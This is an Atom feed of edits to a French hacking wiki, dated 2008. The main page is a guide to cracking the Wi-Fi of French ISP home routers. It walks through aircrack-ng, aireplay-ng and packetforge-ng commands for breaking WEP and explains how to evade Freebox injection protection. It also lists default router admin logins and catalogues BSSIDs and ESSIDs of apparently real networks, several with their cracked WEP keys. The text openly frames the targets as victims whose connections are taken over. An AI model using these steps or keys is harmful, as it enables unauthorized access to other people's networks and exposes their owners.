<?xml version="1.0"?>
<?xml-stylesheet type="text/css" href="http://hack-it.org/skins/common/feed.css?207"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>http://hack-it.org/index.php?feed=atom&amp;target=86.69.58.103&amp;title=Sp%C3%A9cial%3AContributions</id>
		<title>Hack-it.org - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="http://hack-it.org/index.php?feed=atom&amp;target=86.69.58.103&amp;title=Sp%C3%A9cial%3AContributions"/>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Sp%C3%A9cial:Contributions/86.69.58.103"/>
		<updated>2026-04-27T14:13:55Z</updated>
		<subtitle>De Hack-it.org.</subtitle>
		<generator>MediaWiki 1.15.1</generator>

	<entry>
		<id>http://hack-it.org/index.php?title=3g</id>
		<title>3g</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=3g"/>
				<updated>2008-12-11T02:35:58Z</updated>
		
		<summary type="html">&lt;p&gt;86.69.58.103&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* clé 3g&lt;br /&gt;
==Matos==&lt;br /&gt;
* [[Huawei E220]] : http://en.wikipedia.org/wiki/Huawei_E220&lt;br /&gt;
* Orange Novatel : http://arisme.free.fr/Novatel/&lt;br /&gt;
&lt;br /&gt;
==Forfaits==&lt;br /&gt;
http://www.commentcamarche.net/forum/affich-3602299-arnaque-cle-internet-3g&lt;br /&gt;
===Internet Max (Orange, mobicarte)===&lt;br /&gt;
* 9 euros pour un mois, sans engagement&lt;br /&gt;
* Théoriquement limité a 200mo&lt;br /&gt;
* Souscrire : [http://www.orange.fr/bin/frame.cgi?u=http%3A//mobile.orange.fr/content/ge/high/v2_offre_boutique/services_mobiles/orange_world/orange_world_multimedia/multimedia_internet.html ici] ou en tapant le 220 sur son tel (appel gratuit)&lt;br /&gt;
* [http://mobile.orange.fr/content/ge/high/v2_offre_boutique/offre/popup_tarifs/popup_tarifs_orange_world.html Tarifs officiels]&lt;br /&gt;
* [http://www.orange.fr/bin/frame.cgi?u=http%3A//assistance.orange.fr/1115.php%3Fdub%3D2%26 Fini ??]&lt;br /&gt;
===Codes des opérateurs===&lt;br /&gt;
http://forum.mobisophy.com/viewthread.php?tid=3&lt;br /&gt;
&lt;br /&gt;
===SFR Illimythics===&lt;br /&gt;
===Bouygues Imode===&lt;/div&gt;</summary>
		<author><name>86.69.58.103</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Huawei_E220</id>
		<title>Huawei E220</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Huawei_E220"/>
				<updated>2008-12-11T02:01:24Z</updated>
		
		<summary type="html">&lt;p&gt;86.69.58.103&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Débloquer la huawei E220==&lt;br /&gt;
* [http://www.sfrentreprises.fr/elements/documents/espace-utilisateur/global_access/Huawei_E220.zip &amp;quot;Logiciel de désimlockage&amp;quot;] fourni par SFR. [http://file.clochard.org/soft/windows/3g/Huawei_E220.desimlock-by-sfr.zip /mirror/]&lt;br /&gt;
http://en.wikipedia.org/wiki/Huawei_E220&lt;/div&gt;</summary>
		<author><name>86.69.58.103</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=R%C3%83%C2%A9seaux_crypt%C3%83%C2%A9s_(WEP_et_WPA)</id>
		<title>RÃ©seaux cryptÃ©s (WEP et WPA)</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=R%C3%83%C2%A9seaux_crypt%C3%83%C2%A9s_(WEP_et_WPA)"/>
				<updated>2008-12-11T01:44:04Z</updated>
		
		<summary type="html">&lt;p&gt;86.69.58.103&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Dartybox==&lt;br /&gt;
* Nombre de test : bcp.&lt;br /&gt;
===Modes par défaut===&lt;br /&gt;
* Channel &amp;lt;b&amp;gt;3&amp;lt;/b&amp;gt; (peut varier)&lt;br /&gt;
====Ancienne version====&lt;br /&gt;
* Encryption : &amp;lt;b&amp;gt;WEP&amp;lt;/b&amp;gt;&lt;br /&gt;
* ESSID : DartyBox_&amp;lt;i&amp;gt;xxxx&amp;lt;/i&amp;gt; (chiffres et lettres minuscules)&lt;br /&gt;
* BSSID : 00:1D:6A:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
DartyBox_af0a 00:1D:6A:14:71:5D&lt;br /&gt;
DartyBox_9b0a 00:1D:6A:26:98:5E&lt;br /&gt;
DartyBox_2ee0 00:1D:6A:2A:72:A6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Nouvelle version====&lt;br /&gt;
* Encryption : &amp;lt;b&amp;gt;WEP et WPA&amp;lt;/b&amp;gt;&lt;br /&gt;
* Filtrage mac : &amp;lt;b&amp;gt;non&amp;lt;/b&amp;gt;&lt;br /&gt;
* ESSID : DartyBox_XXXX_WEP et DartyBox_XXXX&lt;br /&gt;
* BSSID : 00:1D:19:YY:YY:YY (le même pour les deux !)&lt;br /&gt;
* Clé WEP : elle a une correspondance ASCII de 13 caracteres (chiffres et lettres majuscules mélangés)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
52585546364B434656464E5355&lt;br /&gt;
RXUF6KCFVFNSU&lt;br /&gt;
48503934464C4636415A395955&lt;br /&gt;
HP94FLF6AZ9YU&lt;br /&gt;
DartyBox_B357&lt;br /&gt;
00:1D:19:F3:01:68&lt;br /&gt;
DartyBox_4C0B&lt;br /&gt;
00:1D:19:59:B9:70&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
===Mode Opératoire===&lt;br /&gt;
Facile a péter, même quand il n'y a aucun client connecté en wifi.&amp;lt;br&amp;gt;&lt;br /&gt;
L'AP émet régulièrement des paquet (surtout quand il y a du monde sur le réseau local filaire), il suffit de :&lt;br /&gt;
* Lancer le &amp;lt;b&amp;gt;monitoring&amp;lt;/b&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;airodump-ng wlan0 -c 3 -t wep -w meme&amp;lt;/i&amp;gt;&lt;br /&gt;
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER  AUTH ESSID&lt;br /&gt;
                                                                                                    &lt;br /&gt;
 06:1D:19:XX:XX:XX   24  34     2412       18    0   3  54. WEP  WEP    OPN  DartyBox_XXXX_WEP&lt;br /&gt;
* Faire une &amp;lt;b&amp;gt;fakeauth&amp;lt;/b&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;aireplay-ng wlan0 -1 1000 -o 1 -q 10 -e DartyBox_XXXX_WEP -h 00:11:22:33:44:55&amp;lt;/i&amp;gt;&lt;br /&gt;
* Réinjecter ces paquet à coup de &amp;lt;b&amp;gt;fragmentation&amp;lt;/b&amp;gt; (attaque n°5 de aireplay).&lt;br /&gt;
 Still nothing, quitting with 384 bytes? [y/n] &lt;br /&gt;
 y&lt;br /&gt;
 Saving keystream in fragment-1201-004730.xor&lt;br /&gt;
&amp;lt;i&amp;gt;aireplay-ng wlan0 -5 -r meme-01.cap -e DartyBox_XXXX_WEP -h 00:11:22:33:44:55&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;br&amp;gt; et essayer tous les paquets les uns après les autres (il passe automatiquement au suivant).&lt;br /&gt;
Même si on ne choppe que 384 bytes de keystream, ca suffit.&lt;br /&gt;
* On récupére le fragment qu'on fout dans &amp;lt;b&amp;gt;packet forge&amp;lt;/b&amp;gt; pour obtenir un arp :&lt;br /&gt;
&amp;lt;i&amp;gt;packetforge-ng  --arp -y fragment-XXXX-XXXXXX.xor -a 06:1D:19:XX:XX:XX -h 00:11:22:33:44:55 -k 192.168.1.1 -l 192.168.1.2 -w darty&amp;lt;/i&amp;gt;&lt;br /&gt;
* Puis on &amp;lt;b&amp;gt;injecte&amp;lt;/b&amp;gt; notre paquet fraichement forgé :&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;aireplay-ng wlan0 -3 -r darty -e DartyBox_XXXX_WEP  -h 00:11:22:33:44:55&amp;lt;/i&amp;gt;&lt;br /&gt;
* Et roule ma poule !&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;aicrack -c meme*.cap&amp;lt;/i&amp;gt; (on utilise l'option -c car les clés dartybox sont alphanumériques)&amp;lt;br&amp;gt;&lt;br /&gt;
Ya plus qu'à aller se préparer un gros tajin en attendant.&lt;br /&gt;
===Interface routeur===&lt;br /&gt;
* ?192.168.1.100? ancienne version ?&lt;br /&gt;
* http://192.168.1.254/  login / pass  : DBAdmin / dbox1234  (user : DartyBox/1234)&lt;br /&gt;
==Alice==&lt;br /&gt;
===Paramètres par défaut===&lt;br /&gt;
* Channel &amp;lt;b&amp;gt;11&amp;lt;/b&amp;gt;&lt;br /&gt;
* Encryption : WEP sur les anciennes, WPA sur les nouvelles&lt;br /&gt;
* Clé WEP : longueur de 13 chars hexa&lt;br /&gt;
&lt;br /&gt;
* Anciens AP :&amp;lt;br&amp;gt;&lt;br /&gt;
-v1 ESSID : Alice-&amp;lt;i&amp;gt;xxxx&amp;lt;/i&amp;gt; (chiffres, et lettres en minuscules)&amp;lt;br&amp;gt;&lt;br /&gt;
ssid de forme 00:0F:A3:A&amp;lt;i&amp;gt;Y&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt; ou 00:16:41:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
-v2 ESSID : ALICE-XXXXXX (chiffres, et lettres majuscules)&amp;lt;br&amp;gt;&lt;br /&gt;
ssid de forme 00:03:C9:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt; ou 00:16:38:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Alice-b401 00:0F:A3:AD:C8:BD WEP 11&lt;br /&gt;
Alice-d183 00:16:41:F0:68:1D&lt;br /&gt;
Alice-6e9c:00:0F:A3:AE:78:D7&lt;br /&gt;
Alice-6c3d:00:16:41:4E:32:67&lt;br /&gt;
Alice-b43b 00:16:41:8E:E5:D9&lt;br /&gt;
Alice-5369 00:0F:A3:AD:F9:0F&lt;br /&gt;
Alice-6e9c 00:0F:A3:AE:78:D7&lt;br /&gt;
&lt;br /&gt;
ALICE-C8823C:00:03:C9:D2:E0:81 WEP 11&lt;br /&gt;
ALICE-DA5386 00:03:C9:AC:86:6F&lt;br /&gt;
ALICE-C8823C 00:03:C9:D2:E0:81&lt;br /&gt;
ALICE-2E9A7D 00:16:38:2E:9A:88&lt;br /&gt;
ALICE-197AAE 00:03:C9:19:7A:B9&lt;br /&gt;
ALICE-931425 00:16:38:93:14:30&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Nouveaux AP :&amp;lt;br&amp;gt;&lt;br /&gt;
ALICE-LAN-&amp;lt;i&amp;gt;XXXXXX&amp;lt;/i&amp;gt; pour les nouvelles (chiffres, et lettres en majuscules)&amp;lt;br&amp;gt;&lt;br /&gt;
00:1D:8B:5&amp;lt;i&amp;gt;Y&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YA&amp;lt;/i&amp;lt; et 00:1D:8B:5&amp;lt;i&amp;gt;Y:&amp;lt;i&amp;gt;YY&amp;lt;/i&amp;gt;:&amp;lt;i&amp;gt;YB&amp;lt;/i&amp;gt; (la premiere est l'ap visible, la deuxième a un essid de 19 caractères héxadécimaux, &amp;lt;i&amp;gt;a&amp;lt;/i&amp;gt; correspond au caractere qui suit &amp;lt;i&amp;gt;b&amp;lt;/i&amp;gt;)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ALICE-LAN-94E4F5 00:1D:8B:56:25:9C WPA 11, TKIP,PSK&lt;br /&gt;
	00:1D:8B:56:25:9D WPA 11, TKIP,PSK&lt;br /&gt;
ALICE-LAN-4BF64A 00:1D:8B:5E:4C:B8 &lt;br /&gt;
	00:1D:8B:5E:4C:B9&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Filtrage mac : &amp;lt;b&amp;gt;OUI !&amp;lt;/b&amp;gt;&lt;br /&gt;
===Interface du routeur===&lt;br /&gt;
* http://192.168.1.1 alice/alice&lt;br /&gt;
&lt;br /&gt;
==LiveBox==&lt;br /&gt;
===Modes par defaut===&lt;br /&gt;
* Channel &amp;lt;b&amp;gt;10&amp;lt;/b&amp;gt;&lt;br /&gt;
* Encryption : WEP (pour les anciennes),  WPA (pour les nouvelles)&lt;br /&gt;
* ESSID : Livebox-xxxx (chiffres, et lettres en minuscules)&amp;lt;br&amp;gt;&lt;br /&gt;
* Clé WEP : longueur de 13 chars hexa&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aucun rapport entre le essib et le bssid&lt;br /&gt;
wpa : 00:1A:6B:C1:30:61 00:16:41:D0:7C:A4 00:1E:37:ED:D9:51&amp;lt;br&amp;gt;&lt;br /&gt;
wep :  00:16:41:D0:72:71 00:16:41:4E:82:9E 00:16:41:8C:9D:C5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Filtrage mac : &amp;lt;b&amp;gt;OUI !&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Macs cheulous :&lt;br /&gt;
BSSID  =  00:16:41:D0:72:71&lt;br /&gt;
00:19:4B:4B:A6:99 (source)&lt;br /&gt;
	&amp;gt; 01:00:5E:7F:FF:FA (dest)&lt;br /&gt;
	&amp;gt; 01:00:5E:00:00:01&lt;br /&gt;
&lt;br /&gt;
BSSID  =  00:16:41:4E:82:9E&lt;br /&gt;
00:1E:74:ED:37:B8&lt;br /&gt;
	&amp;gt; 01:00:5E:00:00:01 &lt;br /&gt;
	&amp;gt; 01:00:5E:7F:FF:FA&lt;br /&gt;
00:18:F3:57:E4:7D&lt;br /&gt;
	&amp;gt; 01:00:5E:00:00:FB&lt;br /&gt;
	&amp;gt; FF:FF:FF:FF:FF:FF&lt;br /&gt;
&lt;br /&gt;
BSSID  =  00:16:41:8C:9D:C5&lt;br /&gt;
00:15:56:96:70:9A&lt;br /&gt;
	&amp;gt; 01:00:5E:7F:FF:FA&lt;br /&gt;
	&amp;gt; 01:00:5E:00:00:01&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==NEUF==&lt;br /&gt;
* Channel 11&lt;br /&gt;
* Encryption : WEP (vieux) ou WPA (récents)&lt;br /&gt;
* Clés WEP : 13 caractères ascii (que des lettres)&lt;br /&gt;
* AP récents :&amp;lt;br&amp;gt;&lt;br /&gt;
NEUF_XXXA (majuscules et chiffres)&amp;lt;br&amp;gt;&lt;br /&gt;
00:17:33:ZZ:XX:XB (B est le caractère qui suit A)&amp;lt;br&amp;gt;&lt;br /&gt;
Encryption WPA, Filtrage MAC&amp;lt;br&amp;gt;&lt;br /&gt;
Si Neuf wifi est activé, le routeur emettra l'ap suivant :&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;quot;Neuf WiFi&amp;quot; 00:17:33:ZZ:XX:XC OPN&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
NEUF_B0D0 &lt;br /&gt;
00:17:33:5E:B0:D1 &lt;br /&gt;
00:17:33:5E:B0:D2&lt;br /&gt;
NEUF_BE0829&lt;br /&gt;
00:17:33:96:BE:09&lt;br /&gt;
00:17:33:96:BE:10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Cle Wep (essid, bssid, key hexa, key ascii)&lt;br /&gt;
NEUF_BE00  00:17:33:37:BE:01 66:6C:61:72:68:6F:75:63:6B:65:64:67:61 flarhouckedga&lt;br /&gt;
NEUF_9B24  00:17:33:34:9B:25 6C:75:6E:66:69:6C:67:6F:64:79:6F:79:73 lunfilgodyoys&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Freebox==&lt;br /&gt;
La freebox est le routeur qui est le plus souvent &amp;quot;personnalisé&amp;quot;.&amp;lt;br&amp;gt;&lt;br /&gt;
(au niveau du nom d'essid, du filtrage mac, l'encryption, le channel, la clé...)&amp;lt;br&amp;gt;&lt;br /&gt;
Clé configurée par l'utilisateur final dit bien souvent passphrase petable à coup de dico (point intéressant, les utilisateurs foutent souvent un &amp;lt;b&amp;gt;numéro de téléphone&amp;lt;/b&amp;gt; comme passphrase)&amp;lt;br&amp;gt;&lt;br /&gt;
Elles sont facile à reconnaitre en raison de leur bssid exotique (c'est le seul qui ne commence pas par 00) et du nombre d'ap que le routeur émet.&lt;br /&gt;
===Mode par défaut===&lt;br /&gt;
* channel : 1 ?&lt;br /&gt;
* Clé : WEP + WPA (+ WPA2 sur les dernières)&lt;br /&gt;
* Filtrage mac : yes&lt;br /&gt;
* &amp;lt;b&amp;gt;Protection contre l'injection de masse&amp;lt;/b&amp;gt;&lt;br /&gt;
* Clé WEP par défaut : 5 caractères hexa (correspondant bien souvent, et autant de fois ce n'est pas un hasard, à des caractères ISO aléatoires - genre chiffres, lettres, virgules, accents, diez...)&lt;br /&gt;
* BSSID et ESSID&lt;br /&gt;
Une freebox émet systématiquement 4 AP :&lt;br /&gt;
- &amp;lt;i&amp;gt;XX:XX:XX:XX:XX:XA&amp;lt;/i&amp;gt; : freebox (par défaut), l'AP qui établit la connection internet avec les ordi (c'est celui là qu'il faut péter)&amp;lt;br&amp;gt;&lt;br /&gt;
- &amp;lt;i&amp;gt;XX:XX:XX:XX:XX:XB&amp;lt;/i&amp;gt; : un ap exotique, sûrement destiné à accueillir la tv par wifi&amp;lt;br&amp;gt;&lt;br /&gt;
- &amp;lt;i&amp;gt;XX:XX:XX:XX:XX:XC&amp;lt;/i&amp;gt; : comme son copain du dessus&amp;lt;br&amp;gt;&lt;br /&gt;
- &amp;lt;i&amp;gt;XX:XX:XX:XX:XX:XD&amp;lt;/i&amp;gt; : freephonie, un ap probablement dédié a la voip par wifi&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 16:94:EF:F8:F6:53 13  54  WPA  TKIP   MGT  freephonie                                             &lt;br /&gt;
 16:94:EF:F8:F6:52 13  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                           &lt;br /&gt;
 16:94:EF:F8:F6:51 13  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                           &lt;br /&gt;
 16:94:EF:F8:F6:50 13  54  WEP  WEP         freebox                &lt;br /&gt;
&lt;br /&gt;
 BE:2D:8B:C3:2C:8E 13  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                            &lt;br /&gt;
 BE:2D:8B:C3:2C:8F 13  54  WPA  TKIP   MGT  freephonie                                              &lt;br /&gt;
 BE:2D:8B:C3:2C:8D 13  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                            &lt;br /&gt;
 BE:2D:8B:C3:2C:8C 13  54  WPA  CCMP   PSK  0i0come0com0       &lt;br /&gt;
&lt;br /&gt;
 46:8A:5D:33:2F:5E 2  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                            &lt;br /&gt;
 46:8A:5D:33:2F:5F 2  54  WPA  TKIP   MGT  freephonie                                              &lt;br /&gt;
 46:8A:5D:33:2F:5D 2  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                            &lt;br /&gt;
 46:8A:5D:33:2F:5C 2  54  WPA  CCMP   PSK  ZanReno     &lt;br /&gt;
&lt;br /&gt;
92:CB:0C:3D:A0:2C 1  54  WEP  WEP         guiclaire&lt;br /&gt;
92:CB:0C:3D:A0:2D 1  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;     &lt;br /&gt;
92:CB:0C:3D:A0:2E 1  54  WPA2 CCMP   PSK  &amp;lt;length:  0&amp;gt;                                            &lt;br /&gt;
92:CB:0C:3D:A0:2F 1  54  WPA  TKIP   MGT  freephonie&lt;br /&gt;
&amp;lt;/pre&amp;gt;                                              &lt;br /&gt;
===Interface===&lt;br /&gt;
L'interface de la freebox est la mieux protégée.&amp;lt;br&amp;gt;&lt;br /&gt;
Ici, impossible de toucher quoi que ce soit : l'interface n'est modifiable que sur internet via son &amp;quot;espace client&amp;quot; sur free.fr ; la nouvelle configuration est récupérée par le routeur freebox directement le site de free au redémarrage de ce dernier.&amp;lt;br&amp;gt;&lt;br /&gt;
Si il y a le filtrage mac, on est condamné à toujours utiliser la mac de la victime pour pouvoir utiliser la connection (quel grand désarroi...)&lt;br /&gt;
===Péter une freebox===&lt;br /&gt;
La freebox est bien la seule box en France à disposer d'une protection contre l'injection.&amp;lt;br&amp;gt;&lt;br /&gt;
Même si la clé est en WEP, vous risquez d'en chier.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
En fait, cette protection contre l'injection est surtout pénalisante au niveau de la réinjection d'ARP, mais peut s'activer aussi lors des autres attaques, qui nous permettront de générer notre arp.&amp;lt;br&amp;gt;&lt;br /&gt;
Elle agit apparemment de la façon suivante : lorsque vous sollicitez trop le routeur à la recherche d'ARP, ce dernier vous désauthentifie, et arrête de vous envoyer des arp.&amp;lt;br&amp;gt;&lt;br /&gt;
Il faut alors attendre une minute pour recommencer l'injection&amp;lt;br&amp;gt;&lt;br /&gt;
La solution ?&amp;lt;br&amp;gt;&lt;br /&gt;
Elle est en fait très simple : lors de vos attaques, vous rajoutez le paramètre &amp;lt;b&amp;gt;-X &amp;lt;NUMBER&amp;gt;&amp;lt;/b&amp;gt; qui définira le nombre de paquet à la seconde que vous allez balancer. Plus le routeur est loin de vous, plus ce nombre devra être grand (à cause du nombre de paquets perdus dans l'espace).&amp;lt;br&amp;gt;&lt;br /&gt;
Un &amp;lt;b&amp;gt;-X 30&amp;lt;/b&amp;gt; est en général pas mal. Pour trouver votre vitesse idéale, commencez tout d'abord petit (-X 1, ou -X 5) et augmentez progressivement le facteur jusqu'à ce que la freebox arrête de arrête de répondre à votre paquet. Uitilisez ensuite le dernier &amp;quot;facteur stable&amp;quot; que vous ayez dégotter (il faut procéder à une sorte de dichotomie pour trouver le facteur idéal).&amp;lt;br&amp;gt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois qu'on a découvert un facteur convenable (ou pas) qui sollicite le routeur sans le &amp;quot;bloquer&amp;quot;, il n'y a plus qu'à préparer une bonne grosse soupe de légumes frais.&amp;lt;br&amp;gt;&lt;br /&gt;
Parce qu'avec 10 arp par secondes, vous aurez le temps d'en éplucher, des patates.&amp;lt;br&amp;gt;&lt;br /&gt;
(ceci dit, avec la longueur généralement faible des clés freebox, ca ne dépassera surement pas une heure, voire 15mn)&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une technique subsidiaire qui marchait sur les anciennes freebox (ou les anciens firmware ?) consistait à balancer 300 paquet par seconde à l'AP, celui-ci mettait en effait une minute à se bloquer, ce qui présageait ~ 5000 paquets à récupérer avant d'attendre que l'ap ne se débloque à nouveau. Une technique bien pourrie, qui obligeait à rester en permanence sur airodump pour relancer la machine aircrack toutes les 5mn en vérifiant que ca marchait bien à chaque fois. Cette méthode semble apparemment ne plus être d'actualité, les routeurs freebox étant désormais bridés en nombre en envoi d'arp même si il ne sont pas sur la &amp;quot;défensive&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==Les autres AP==&lt;br /&gt;
TECOM SFR SpeedTouch Wanadoo&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
N9UF_TEL9COM&lt;br /&gt;
00:16:CE:50:69:1C 8 WEP&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Wanadoo_6b4c 00:03:C9:63:13:D4 10 WEP&lt;br /&gt;
Wanadoo_a901 00:10:C6:EB:6C:64 10 WEP&lt;br /&gt;
Wanadoo_7841 00:03:C9:63:03:90 10 WEP&lt;br /&gt;
Wanadoo_fbac 00:03:C9:55:4C:68 10 WEP&lt;br /&gt;
Wanadoo_85c1 00:16:41:03:92:BA&lt;br /&gt;
Wanadoo_210a 00:03:C9:BD:A6:36&lt;br /&gt;
Wanadoo_6e25 00:10:C6:EB:7C:CF&lt;br /&gt;
Wanadoo_210a 00:03:C9:BD:A6:36&lt;br /&gt;
Wanadoo_fb3d 00:10:C6:CB:3A:45&lt;br /&gt;
Wanadoo_b581 00:03:C9:7B:B1:41&lt;br /&gt;
Wanadoo_d6c9 00:16:41:4F:CB:2D&lt;br /&gt;
Wanadoo_3851 00:16:41:0C:3E:88&lt;br /&gt;
Wanadoo_f009 00:10:C6:C9:9A:7B&lt;br /&gt;
&lt;br /&gt;
WANADOO-9C5B 00:14:A4:43:DF:70 1 WPA&lt;br /&gt;
WANADOO-F3AC 00:14:A4:52:34:A6 10 WEP&lt;br /&gt;
WANADOO-CC08 00:16:CE:21:76:BD 7 WPA&lt;br /&gt;
WANADOO-7C50 00:16:CE:15:1E:E8 1 WPA&lt;br /&gt;
WANADOO-FC08 00:16:CE:2F:11:BC 1 WPA&lt;br /&gt;
WANADOO-8460 00:0E:9B:C5:04:DC 1 WEP&lt;br /&gt;
&lt;br /&gt;
SFR_ADSL_0466D 00:1D:19:6F:5E:CA 13 WEP&lt;br /&gt;
SFR_ADSL_277A1 00:01:36:16:0A:12 4 WEP&lt;br /&gt;
&lt;br /&gt;
SpeedTouchD3DCC4 00:14:7F:B3:7D:E3 6 WEP&lt;br /&gt;
SpeedTouch98C82F&lt;br /&gt;
&lt;br /&gt;
Wanadoo_8b69	00:03:C9:72:35:89	FC:F6:A3:ED:CC:79:34:42:DE:45:55:D5:C5&lt;br /&gt;
Livebox-c150	00:1A:6B:E9:56:27	77:E6:5F:4D:A5:A2:59:7A:2A:E4:55:E9:5E&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>86.69.58.103</name></author>	</entry>

	</feed>